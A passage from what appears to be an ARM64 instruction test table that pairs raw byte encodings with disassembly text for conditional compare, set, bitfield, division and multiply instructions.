("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\xc2\xfd\xbf\xd2", "movz x2, #0xffee, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x41\x14\x82\x9a", "cinc x1, x2, eq"),
("\x41\x04\x82\x9a", "cinc x1, x2, ne"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\xfc\x40\xd3", "ubfiz x0, x1, #0, #64"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf8\x7f\xd3", "ubfiz x0, x1, #1, #63"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf4\x7e\xd3", "ubfiz x0, x1, #2, #62"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf0\x7d\xd3", "ubfiz x0, x1, #3, #61"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xec\x7c\xd3", "ubfiz x0, x1, #4, #60"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe8\x7b\xd3", "ubfiz x0, x1, #5, #59"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe4\x7a\xd3", "ubfiz x0, x1, #6, #58"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe0\x79\xd3", "ubfiz x0, x1, #7, #57"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xdc\x78\xd3", "ubfiz x0, x1, #8, #56"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x7a\xd3", "ubfiz x0, x1, #6, #32"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x78\xd3", "ubfiz x0, x1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x41\xd3", "ubfiz x0, x1, #63, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x18\x53", "ubfiz w0, w1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x01\x53", "ubfiz w0, w1, #31, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x00\x53", "ubfiz w0, w1, #0, #32"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\xa2\x9b", "umull x0, w1, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x7c\xc1\x9b", "umulh x0, x1, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\xa2\x9b", "umnegl x0, w1, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
